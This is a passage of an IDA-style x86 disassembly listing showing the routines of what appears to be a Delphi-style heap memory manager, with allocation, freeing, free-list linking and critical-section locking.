mov edx, [esi]
add [edx+8], eax
mov eax, [esp+28h+var_28]
mov eax, [eax+4]
mov edx, [esi]
sub [edx+0Ch], eax
mov eax, [esi]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40187F
mov eax, [esi]
call sub_4011FC
jmp short loc_40187F
; ---------------------------------------------------------------------------
loc_401878: ; CODE XREF: sub_401744+F0�j
; sub_401744+F7�j
mov eax, [esp+28h+var_28]
xor edx, edx
mov [eax], edx
loc_40187F: ; CODE XREF: sub_401744+9C�j
; sub_401744+E7�j ...
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401744 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401888 proc near ; CODE XREF: sub_401D0C+5B�p
; sub_401D0C+6C�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFE8h
mov ebx, ecx
lea ecx, [eax+3FFFh]
and ecx, 0FFFFC000h
mov [esp+1Ch+var_1C], ecx
add edx, eax
and edx, 0FFFFC000h
mov [esp+1Ch+var_18], edx
mov eax, [esp+1Ch+var_18]
cmp eax, [esp+1Ch+var_1C]
jbe short loc_401911
mov ecx, ebx
mov edx, [esp+1Ch+var_18]
sub edx, [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
call sub_4015E0
lea ecx, [esp+1Ch+var_14]
mov edx, ebx
mov eax, offset off_4075E4
call sub_401230
mov ebx, [esp+1Ch+var_14]
test ebx, ebx
jz short loc_4018FA
lea ecx, [esp+1Ch+var_C]
mov edx, [esp+1Ch+var_10]
mov eax, ebx
call sub_401458
mov eax, [esp+1Ch+var_C]
mov [esp+1Ch+var_14], eax
mov eax, [esp+1Ch+var_8]
mov [esp+1Ch+var_10], eax
loc_4018FA: ; CODE XREF: sub_401888+51�j
cmp [esp+1Ch+var_14], 0
jz short loc_401915
lea edx, [esp+1Ch+var_14]
mov eax, offset off_4075E4
call sub_4012B8
jmp short loc_401915
; ---------------------------------------------------------------------------
loc_401911: ; CODE XREF: sub_401888+28�j
xor eax, eax
mov [ebx], eax
loc_401915: ; CODE XREF: sub_401888+77�j
; sub_401888+87�j
add esp, 18h
pop ebx
retn
sub_401888 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40191C proc near ; CODE XREF: sub_402178+12�p
; sub_402324+19�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00402F8C SIZE 00000036 BYTES
push ebp
mov ebp, esp
push ecx
xor edx, edx
push ebp
push offset loc_4019E4
push dword ptr fs:[edx]
mov fs:[edx], esp
push offset dword_4075B4
call sub_4010F4 ; InitializeCriticalSection
cmp ds:byte_407035, 0
jz short loc_40194B
push offset dword_4075B4
call sub_4010FC ; RtlEnterCriticalSection
loc_40194B: ; CODE XREF: sub_40191C+23�j
mov eax, offset off_4075D4
call sub_401198
mov eax, offset off_4075E4
call sub_401198
mov eax, offset off_407610
call sub_401198
push 0FF8h
push 0
call sub_4010D4 ; LocalAlloc
mov ds:dword_40760C, eax
cmp ds:dword_40760C, 0
jz short loc_4019C3
mov eax, 3
loc_401988: ; CODE XREF: sub_40191C+7E�j
mov edx, ds:dword_40760C
xor ecx, ecx
mov [edx+eax*4-0Ch], ecx
inc eax
cmp eax, 401h
jnz short loc_401988
mov [ebp+var_4], offset dword_4075F4
mov eax, [ebp+var_4]
mov edx, [ebp+var_4]
mov [eax+4], edx
mov eax, [ebp+var_4]
mov edx, [ebp+var_4]
mov [eax], edx
mov eax, [ebp+var_4]
mov ds:dword_407600, eax
mov ds:byte_4075AC, 1
loc_4019C3: ; CODE XREF: sub_40191C+65�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4019EB
loc_4019D0: ; CODE XREF: sub_40191C+CD�j
cmp ds:byte_407035, 0
jz short locret_4019E3
push offset dword_4075B4
call sub_401104 ; RtlLeaveCriticalSection
locret_4019E3: ; CODE XREF: sub_40191C+BB�j
retn
; ---------------------------------------------------------------------------
loc_4019E4: ; DATA XREF: sub_40191C+7�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_4019D0
; ---------------------------------------------------------------------------
loc_4019EB: ; DATA XREF: sub_40191C+AF�o
mov al, ds:byte_4075AC
pop ecx
pop ebp
retn
sub_40191C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019F4 proc near ; CODE XREF: sub_403A90+37�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
cmp ds:byte_4075AC, 0
jz loc_401AEF
xor eax, eax
push ebp
push offset loc_401AE8
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp ds:byte_407035, 0
jz short loc_401A28
push offset dword_4075B4
call sub_4010FC ; RtlEnterCriticalSection
loc_401A28: ; CODE XREF: sub_4019F4+28�j
mov ds:byte_4075AC, 0
mov eax, ds:dword_40760C
push eax
call sub_4010DC ; LocalFree
xor eax, eax
mov ds:dword_40760C, eax
mov eax, ds:off_4075D4
mov [ebp+var_8], eax
jmp short loc_401A66
; ---------------------------------------------------------------------------
loc_401A4B: ; CODE XREF: sub_4019F4+7A�j
push 8000h
push 0
mov eax, [ebp+var_8]
mov eax, [eax+8]
push eax
call sub_4010EC ; VirtualFree
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
loc_401A66: ; CODE XREF: sub_4019F4+55�j
mov eax, offset off_4075D4
cmp eax, [ebp+var_8]
jnz short loc_401A4B
mov eax, offset off_4075D4
call sub_401198
mov eax, offset off_4075E4
call sub_401198
mov eax, offset off_407610
call sub_401198
mov eax, ds:dword_4075CC
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_401ABD
loc_401A9C: ; CODE XREF: sub_4019F4+C7�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ds:dword_4075CC, eax
mov eax, [ebp+var_4]
push eax
call sub_4010DC ; LocalFree
mov eax, ds:dword_4075CC
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401A9C
loc_401ABD: ; CODE XREF: sub_4019F4+A6�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401AEF
loc_401ACA: ; CODE XREF: sub_4019F4+F9�j
cmp ds:byte_407035, 0
jz short loc_401ADD
push offset dword_4075B4
call sub_401104 ; RtlLeaveCriticalSection
loc_401ADD: ; CODE XREF: sub_4019F4+DD�j
push offset dword_4075B4
call sub_40110C ; RtlDeleteCriticalSection
retn
; ---------------------------------------------------------------------------
loc_401AE8: ; DATA XREF: sub_4019F4+16�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_401ACA
; ---------------------------------------------------------------------------
loc_401AEF: ; CODE XREF: sub_4019F4+D�j
; DATA XREF: sub_4019F4+D1�o
pop ecx
pop ecx
pop ebp
retn
sub_4019F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401AF4 proc near ; CODE XREF: sub_401C54+6B�p
; sub_401CCC+25�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFF8h
cmp eax, ds:dword_407600
jnz short loc_401B09
mov edx, [eax+4]
mov ds:dword_407600, edx
loc_401B09: ; CODE XREF: sub_401AF4+A�j
mov edx, [eax+4]
mov [esp+0Ch+var_C], edx
mov edx, [eax+8]
cmp edx, 1000h
jg short loc_401B68
cmp eax, [esp+0Ch+var_C]
jnz short loc_401B36
test edx, edx
jns short loc_401B26
add edx, 3
loc_401B26: ; CODE XREF: sub_401AF4+2D�j
sar edx, 2
mov eax, ds:dword_40760C
xor ecx, ecx
mov [eax+edx*4-0Ch], ecx
jmp short loc_401B81
; ---------------------------------------------------------------------------
loc_401B36: ; CODE XREF: sub_401AF4+29�j
test edx, edx
jns short loc_401B3D
add edx, 3
loc_401B3D: ; CODE XREF: sub_401AF4+44�j
sar edx, 2
mov ecx, ds:dword_40760C
mov ebx, [esp+0Ch+var_C]
mov [ecx+edx*4-0Ch], ebx
mov eax, [eax]
mov [esp+0Ch+var_8], eax
mov eax, [esp+0Ch+var_C]
mov edx, [esp+0Ch+var_8]
mov [eax], edx
mov eax, [esp+0Ch+var_8]
mov edx, [esp+0Ch+var_C]
mov [eax+4], edx
jmp short loc_401B81
; ---------------------------------------------------------------------------
loc_401B68: ; CODE XREF: sub_401AF4+24�j
mov eax, [eax]
mov [esp+0Ch+var_8], eax
mov eax, [esp+0Ch+var_C]
mov edx, [esp+0Ch+var_8]
mov [eax], edx
mov eax, [esp+0Ch+var_8]
mov edx, [esp+0Ch+var_C]
mov [eax+4], edx
loc_401B81: ; CODE XREF: sub_401AF4+40�j
; sub_401AF4+72�j
pop ecx
pop edx
pop ebx
retn
sub_401AF4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B88 proc near ; CODE XREF: sub_401D0C+F�p
push ebx
push ecx
mov ecx, esp
mov edx, ds:off_407610
mov [ecx], edx
jmp short loc_401BAE
; ---------------------------------------------------------------------------
loc_401B96: ; CODE XREF: sub_401B88+2D�j
mov edx, [ecx]
mov edx, [edx+8]
cmp eax, edx
jb short loc_401BA8
mov ebx, [ecx]
add edx, [ebx+0Ch]
cmp eax, edx
jb short loc_401BC5
loc_401BA8: ; CODE XREF: sub_401B88+15�j
mov edx, [ecx]
mov edx, [edx]
mov [ecx], edx
loc_401BAE: ; CODE XREF: sub_401B88+C�j
mov edx, offset off_407610
cmp edx, [ecx]
jnz short loc_401B96
mov ds:dword_4075B0, 3
xor eax, eax
mov [ecx], eax
loc_401BC5: ; CODE XREF: sub_401B88+1E�j
mov eax, [ecx]
pop edx
pop ebx
retn
sub_401B88 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401BCC proc near ; CODE XREF: sub_401D0C+7E�p
; sub_401F0C+68�p
var_8 = dword ptr -8
push ebx
push ecx
mov ecx, edx
sub ecx, 4
lea ebx, [ecx+eax]
mov [esp+8+var_8], ebx
cmp edx, 10h
jl short loc_401BF1
mov edx, [esp+8+var_8]
mov dword ptr [edx], 80000007h
mov edx, ecx
call sub_401DC8
pop edx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401BF1: ; CODE XREF: sub_401BCC+10�j
cmp edx, 4
jl short loc_401C05
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
mov eax, [esp+8+var_8]
mov [eax], ecx
loc_401C05: ; CODE XREF: sub_401BCC+28�j
pop edx
pop ebx
retn
sub_401BCC endp
; =============== S U B R O U T I N E =======================================
sub_401C08 proc near ; CODE XREF: sub_401C2C+D�p
; sub_401EC0+36�p ...
inc ds:dword_40759C
mov edx, eax
sub edx, 4
mov edx, [edx]
and edx, 7FFFFFFCh
sub edx, 4
add ds:dword_4075A0, edx
call sub_402324
retn
sub_401C08 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401C2C proc near ; CODE XREF: sub_401D0C+A0�p
cmp edx, 0Ch
jl short loc_401C3F
or edx, 2
mov [eax], edx
add eax, 4
call sub_401C08
retn
; ---------------------------------------------------------------------------
loc_401C3F: ; CODE XREF: sub_401C2C+3�j
cmp edx, 4
jl short loc_401C4E
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
loc_401C4E: ; CODE XREF: sub_401C2C+16�j
add eax, edx
and dword ptr [eax], 0FFFFFFFEh
retn
sub_401C2C endp
; =============== S U B R O U T I N E =======================================
sub_401C54 proc near ; CODE XREF: sub_401F0C+36�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov edx, eax
sub edx, 4
mov edx, [edx]
mov ecx, edx
and ecx, 80000002h
cmp ecx, 80000002h
jz short loc_401C78
mov ds:dword_4075B0, 4
loc_401C78: ; CODE XREF: sub_401C54+18�j
mov ebx, edx
and ebx, 7FFFFFFCh
sub eax, ebx
mov ecx, eax
xor edx, [ecx]
test edx, 0FFFFFFFEh
jz short loc_401C98
mov ds:dword_4075B0, 5
loc_401C98: ; CODE XREF: sub_401C54+38�j
test byte ptr [ecx], 1
jz short loc_401CC6
mov edx, eax
sub edx, 0Ch
mov esi, [edx+8]
sub eax, esi
mov [esp+0Ch+var_C], eax
mov eax, [esp+0Ch+var_C]
cmp esi, [eax+8]
jz short loc_401CBC
mov ds:dword_4075B0, 6
loc_401CBC: ; CODE XREF: sub_401C54+5C�j
mov eax, [esp+0Ch+var_C]
call sub_401AF4
add ebx, esi
loc_401CC6: ; CODE XREF: sub_401C54+47�j
mov eax, ebx
pop edx
pop esi
pop ebx
retn
sub_401C54 endp
; =============== S U B R O U T I N E =======================================
sub_401CCC proc near ; CODE XREF: sub_401F0C+4F�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov ebx, eax
xor esi, esi
mov eax, [ebx]
test eax, 80000000h
jz short loc_401CE7
and eax, 7FFFFFFCh
add esi, eax
add ebx, eax
mov eax, [ebx]
loc_401CE7: ; CODE XREF: sub_401CCC+E�j
test al, 2
jnz short loc_401D03
mov [esp+0Ch+var_C], ebx
mov eax, [esp+0Ch+var_C]
call sub_401AF4
mov eax, [esp+0Ch+var_C]
mov eax, [eax+8]
add esi, eax
add ebx, eax
and dword ptr [ebx], 0FFFFFFFEh
loc_401D03: ; CODE XREF: sub_401CCC+1D�j
mov eax, esi
pop edx
pop esi
pop ebx
retn
sub_401CCC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401D0C proc near ; CODE XREF: sub_401DC8+A7�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov esi, edx
mov ebp, eax
xor ebx, ebx
mov eax, ebp
call sub_401B88
mov [esp+1Ch+var_14], eax
cmp [esp+1Ch+var_14], 0
jz loc_401DBE
mov eax, [esp+1Ch+var_14]
mov edi, [eax+8]
mov eax, edi
mov edx, [esp+1Ch+var_14]
add eax, [edx+0Ch]
mov edx, eax
lea ecx, [esi+ebp]
sub edx, ecx
cmp edx, 0Ch
jg short loc_401D4F
mov esi, eax
sub esi, ebp
loc_401D4F: ; CODE XREF: sub_401D0C+3D�j
mov eax, ebp
sub eax, edi
cmp eax, 0Ch
jge short loc_401D6E
mov eax, [esp+1Ch+var_14]
mov edx, ebp
sub edx, [eax+8]
add edx, esi
mov ecx, esp
mov eax, edi
call sub_401888
jmp short loc_401D7D
; ---------------------------------------------------------------------------
loc_401D6E: ; CODE XREF: sub_401D0C+4A�j
mov ecx, esp
mov edx, esi
sub edx, 4
lea eax, [ebp+4]
call sub_401888
loc_401D7D: ; CODE XREF: sub_401D0C+60�j
mov edi, [esp+1Ch+var_1C]
test edi, edi
jz short loc_401DBE
mov edx, edi
sub edx, ebp
mov eax, ebp
call sub_401BCC
mov edx, [esp+1Ch+var_14]
mov edx, [edx+8]
mov ecx, [esp+1Ch+var_14]
add edx, [ecx+0Ch]
mov eax, edi
add eax, [esp+1Ch+var_18]
cmp edx, eax
jbe short loc_401DB1
lea edx, [esi+ebp]
sub edx, eax
call sub_401C2C
loc_401DB1: ; CODE XREF: sub_401D0C+99�j
mov edx, esp
mov eax, [esp+1Ch+var_14]
call sub_4012B8
mov bl, 1
loc_401DBE: ; CODE XREF: sub_401D0C+1D�j
; sub_401D0C+76�j
mov eax, ebx
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401D0C endp
; =============== S U B R O U T I N E =======================================
sub_401DC8 proc near ; CODE XREF: sub_401BCC+1D�p
; sub_402030+EE�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF4h
mov ebx, edx
mov esi, eax
mov [esp+14h+var_14], esi
mov eax, [esp+14h+var_14]
mov [eax+8], ebx
mov eax, [esp+14h+var_14]
add eax, ebx
sub eax, 0Ch
mov [eax+8], ebx
cmp ebx, 1000h
jg short loc_401E63
mov eax, ebx
test eax, eax
jns short loc_401DF6
add eax, 3
loc_401DF6: ; CODE XREF: sub_401DC8+29�j
sar eax, 2
mov edx, ds:dword_40760C
mov edx, [edx+eax*4-0Ch]
mov [esp+14h+var_10], edx
cmp [esp+14h+var_10], 0
jnz short loc_401E31
mov edx, ds:dword_40760C
mov ecx, [esp+14h+var_14]
mov [edx+eax*4-0Ch], ecx
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_14]
mov [eax+4], edx
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_14]
mov [eax], edx
jmp loc_401EB9
; ---------------------------------------------------------------------------
loc_401E31: ; CODE XREF: sub_401DC8+44�j
mov eax, [esp+14h+var_10]
mov eax, [eax]
mov [esp+14h+var_C], eax
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_10]
mov [eax+4], edx
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_C]
mov [eax], edx
mov eax, [esp+14h+var_10]
mov edx, [esp+14h+var_14]
mov [eax], edx
mov eax, [esp+14h+var_C]
mov edx, [esp+14h+var_14]
mov [eax+4], edx
jmp short loc_401EB9
; ---------------------------------------------------------------------------
loc_401E63: ; CODE XREF: sub_401DC8+23�j
cmp ebx, 3C00h
jl short loc_401E78
mov edx, ebx
mov eax, esi
call sub_401D0C
test al, al
jnz short loc_401EB9
loc_401E78: ; CODE XREF: sub_401DC8+A1�j
mov eax, ds:dword_407600
mov [esp+14h+var_10], eax
mov eax, [esp+14h+var_14]
mov ds:dword_407600, eax
mov eax, [esp+14h+var_10]
mov eax, [eax]
mov [esp+14h+var_C], eax
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_10]
mov [eax+4], edx
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_C]
mov [eax], edx
mov eax, [esp+14h+var_10]
mov edx, [esp+14h+var_14]
mov [eax], edx
mov eax, [esp+14h+var_C]
mov edx, [esp+14h+var_14]
mov [eax+4], edx
loc_401EB9: ; CODE XREF: sub_401DC8+64�j
; sub_401DC8+99�j ...
add esp, 0Ch
pop esi
pop ebx
retn
sub_401DC8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EC0 proc near ; CODE XREF: sub_401F0C+F�p
; sub_402324+11D�p ...
cmp ds:dword_407604, 0
jle short locret_401F09
cmp ds:dword_407604, 0Ch
jge short loc_401EDE
mov ds:dword_4075B0, 7
jmp short locret_401F09
; ---------------------------------------------------------------------------
loc_401EDE: ; CODE XREF: sub_401EC0+10�j
mov eax, ds:dword_407604
or eax, 2
mov edx, ds:dword_407608
mov [edx], eax
mov eax, ds:dword_407608
add eax, 4
call sub_401C08
xor eax, eax
mov ds:dword_407608, eax
xor eax, eax
mov ds:dword_407604, eax
locret_401F09: ; CODE XREF: sub_401EC0+7�j
; sub_401EC0+1C�j
retn
sub_401EC0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401F0C proc near ; CODE XREF: sub_401F98+18�p
; sub_401FC4+1D�p
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFF0h
mov esi, eax
lea edi, [esp+1Ch+var_1C]
movsd
movsd
mov edi, esp
call sub_401EC0
lea ecx, [esp+1Ch+var_14]
mov edx, edi
mov eax, offset off_407610
call sub_401230
mov ebx, [esp+1Ch+var_14]
test ebx, ebx
jnz short loc_401F3C
xor eax, eax
jmp short loc_401F8E
; ---------------------------------------------------------------------------
loc_401F3C: ; CODE XREF: sub_401F0C+2A�j
mov eax, [edi]
cmp ebx, eax
jnb short loc_401F4C
call sub_401C54
sub [edi], eax
add [edi+4], eax
loc_401F4C: ; CODE XREF: sub_401F0C+34�j
mov eax, [edi]
add eax, [edi+4]
mov esi, ebx
add esi, [esp+1Ch+var_10]
cmp eax, esi
jnb short loc_401F63
call sub_401CCC
add [edi+4], eax
loc_401F63: ; CODE XREF: sub_401F0C+4D�j
mov eax, [edi]
add eax, [edi+4]
cmp esi, eax
jnz short loc_401F7D
sub eax, 4
mov edx, 4
call sub_401BCC
sub dword ptr [edi+4], 4
loc_401F7D: ; CODE XREF: sub_401F0C+5E�j
mov eax, [edi]
mov ds:dword_407608, eax
mov eax, [edi+4]
mov ds:dword_407604, eax
mov al, 1
loc_401F8E: ; CODE XREF: sub_401F0C+2E�j
add esp, 10h
pop edi
pop esi
pop ebx
retn
sub_401F0C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401F98 proc near ; CODE XREF: sub_402030+76�p
var_C = dword ptr -0Ch
push ebx
add esp, 0FFFFFFF8h
mov ebx, eax
mov edx, esp
lea eax, [ebx+4]
call sub_40169C
cmp [esp+0Ch+var_C], 0
jz short loc_401FB9
mov eax, esp
call sub_401F0C
test al, al
jnz short loc_401FBD
loc_401FB9: ; CODE XREF: sub_401F98+14�j
xor eax, eax
jmp short loc_401FBF
; ---------------------------------------------------------------------------
loc_401FBD: ; CODE XREF: sub_401F98+1F�j
mov al, 1
loc_401FBF: ; CODE XREF: sub_401F98+23�j
pop ecx
pop edx
pop ebx
retn
sub_401F98 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401FC4 proc near ; CODE XREF: sub_4024FC+1C3�p
var_10 = dword ptr -10h
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
mov ecx, esp
lea edx, [esi+4]
mov eax, ebx
call sub_401744
cmp [esp+10h+var_10], 0
jz short loc_401FEA
mov eax, esp
call sub_401F0C
test al, al
jnz short loc_401FEE
loc_401FEA: ; CODE XREF: sub_401FC4+19�j
xor eax, eax
jmp short loc_401FF0
; ---------------------------------------------------------------------------
loc_401FEE: ; CODE XREF: sub_401FC4+24�j
mov al, 1
loc_401FF0: ; CODE XREF: sub_401FC4+28�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_401FC4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401FF8 proc near ; CODE XREF: sub_402030+68�p
push ecx
mov edx, esp
xor ecx, ecx
mov [edx], ecx
test eax, eax
jns short loc_402006
add eax, 3
loc_402006: ; CODE XREF: sub_401FF8+9�j
sar eax, 2
cmp eax, 400h
jg short loc_402029
loc_402010: ; CODE XREF: sub_401FF8+2F�j
mov ecx, ds:dword_40760C
mov ecx, [ecx+eax*4-0Ch]
mov [edx], ecx
cmp dword ptr [edx], 0
jnz short loc_402029
inc eax
cmp eax, 401h
jnz short loc_402010
loc_402029: ; CODE XREF: sub_401FF8+16�j
; sub_401FF8+27�j
mov eax, [edx]
pop edx
retn
sub_401FF8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402030 proc near ; CODE XREF: sub_402178+173�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov ebx, eax
lea esi, [esp+1Ch+var_14]
mov edi, offset dword_407600
mov ebp, offset dword_407604
loc_402047: ; CODE XREF: sub_402030+8C�j
mov eax, ds:dword_4075F8
mov [esi], eax
mov eax, [esi]
cmp ebx, [eax+8]
jle loc_402104
mov eax, [edi]
mov [esi], eax
mov eax, [esi]
mov eax, [eax+8]
cmp ebx, eax
jle loc_402104
mov edx, [esi]
mov [edx+8], ebx
loc_40206F: ; CODE XREF: sub_402030+4B�j
mov edx, [esi]
mov edx, [edx+4]
mov [esi], edx
mov edx, [esi]
cmp ebx, [edx+8]
jg short loc_40206F
mov edx, [edi]
mov [edx+8], eax
mov eax, [esi]
cmp eax, [edi]
jz short loc_40208E
mov eax, [esi]
mov [edi], eax
jmp short loc_402104
; ---------------------------------------------------------------------------
loc_40208E: ; CODE XREF: sub_402030+56�j
cmp ebx, 1000h
jg short loc_4020A4
mov eax, ebx
call sub_401FF8
mov [esi], eax
cmp dword ptr [esi], 0
jnz short loc_402104
loc_4020A4: ; CODE XREF: sub_402030+64�j
mov eax, ebx
call sub_401F98
test al, al
jnz short loc_4020B9
xor eax, eax
mov [esp+1Ch+var_1C], eax
jmp loc_40216D
; ---------------------------------------------------------------------------
loc_4020B9: ; CODE XREF: sub_402030+7D�j
cmp ebx, [ebp+0]
jg short loc_402047
sub [ebp+0], ebx
cmp dword ptr [ebp+0], 0Ch
jge short loc_4020CF
add ebx, [ebp+0]
xor eax, eax
mov [ebp+0], eax
loc_4020CF: ; CODE XREF: sub_402030+95�j
mov eax, ds:dword_407608
mov [esp+1Ch+var_18], eax
add ds:dword_407608, ebx
mov eax, ebx
or eax, 2
mov edx, [esp+1Ch+var_18]
mov [edx], eax
mov eax, [esp+1Ch+var_18]
add eax, 4
mov [esp+1Ch+var_1C], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
jmp short loc_40216D
; ---------------------------------------------------------------------------
loc_402104: ; CODE XREF: sub_402030+23�j
; sub_402030+34�j ...
mov eax, [esi]
call sub_401AF4
mov eax, [esi]
mov edx, [eax+8]
mov eax, edx
sub eax, ebx
cmp eax, 0Ch
jl short loc_402125
mov edx, [esi]
add edx, ebx
xchg eax, edx
call sub_401DC8
jmp short loc_402143
; ---------------------------------------------------------------------------
loc_402125: ; CODE XREF: sub_402030+E7�j
mov ebx, edx
mov eax, [esi]
cmp eax, [edi]
jnz short loc_402134
mov eax, [esi]
mov eax, [eax+4]
mov [edi], eax
loc_402134: ; CODE XREF: sub_402030+FB�j
mov eax, [esi]
add eax, ebx
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+var_18]
and dword ptr [eax], 0FFFFFFFEh
loc_402143: ; CODE XREF: sub_402030+F3�j
mov eax, [esi]
mov [esp+1Ch+var_18], eax
mov eax, ebx
or eax, 2
mov edx, [esp+1Ch+var_18]
mov [edx], eax
mov eax, [esp+1Ch+var_18]
add eax, 4
mov [esp+1Ch+var_1C], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
loc_40216D: ; CODE XREF: sub_402030+84�j
; sub_402030+D2�j
mov eax, [esp+1Ch+var_1C]
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_402030 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402178 proc near ; CODE XREF: sub_402700+5D�p
; sub_4027CC+A�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
mov ebx, eax
cmp ds:byte_4075AC, 0
jnz short loc_402193
call sub_40191C
test al, al
jz short loc_40219B
loc_402193: ; CODE XREF: sub_402178+10�j
cmp ebx, 7FFFFFF8h
jle short loc_4021A5
loc_40219B: ; CODE XREF: sub_402178+19�j
xor eax, eax
mov [ebp+var_4], eax
jmp loc_40231B
; ---------------------------------------------------------------------------
loc_4021A5: ; CODE XREF: sub_402178+21�j
xor edx, edx
push ebp
push offset loc_402314
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_407035, 0
jz short loc_4021C6
push offset dword_4075B4
call sub_4010FC ; RtlEnterCriticalSection
loc_4021C6: ; CODE XREF: sub_402178+42�j
add ebx, 7
and ebx, 0FFFFFFFCh
cmp ebx, 0Ch
jge short loc_4021D6
mov ebx, 0Ch
loc_4021D6: ; CODE XREF: sub_402178+57�j
cmp ebx, 1000h
jg loc_40228E
mov eax, ebx
test eax, eax
jns short loc_4021EB
add eax, 3
loc_4021EB: ; CODE XREF: sub_402178+6E�j
sar eax, 2
mov edx, ds:dword_40760C
mov edx, [edx+eax*4-0Ch]
mov [ebp+var_8], edx
cmp [ebp+var_8], 0
jz loc_40228E
mov edx, [ebp+var_8]
add edx, ebx
mov [ebp+var_14], edx
mov edx, [ebp+var_14]
and dword ptr [edx], 0FFFFFFFEh
mov edx, [ebp+var_8]
mov edx, [edx+4]
mov [ebp+var_10], edx
mov edx, [ebp+var_10]
cmp edx, [ebp+var_8]
jnz short loc_402232
mov edx, ds:dword_40760C
xor ecx, ecx
mov [edx+eax*4-0Ch], ecx
jmp short loc_402258
; ---------------------------------------------------------------------------
loc_402232: ; CODE XREF: sub_402178+AA�j
mov edx, ds:dword_40760C
mov ecx, [ebp+var_10]
mov [edx+eax*4-0Ch], ecx
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov edx, [ebp+var_10]
mov [eax+4], edx
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
mov [eax], edx
loc_402258: ; CODE XREF: sub_402178+B8�j
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
or eax, 2
mov edx, [ebp+var_14]
mov [edx], eax
mov eax, [ebp+var_14]
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
call sub_403048
jmp loc_40231B
; ---------------------------------------------------------------------------
loc_40228E: ; CODE XREF: sub_402178+64�j
; sub_402178+87�j
cmp ebx, ds:dword_407604
jg short loc_4022E9
sub ds:dword_407604, ebx
cmp ds:dword_407604, 0Ch
jge short loc_4022B2
add ebx, ds:dword_407604
xor eax, eax
mov ds:dword_407604, eax
loc_4022B2: ; CODE XREF: sub_402178+12B�j
mov eax, ds:dword_407608
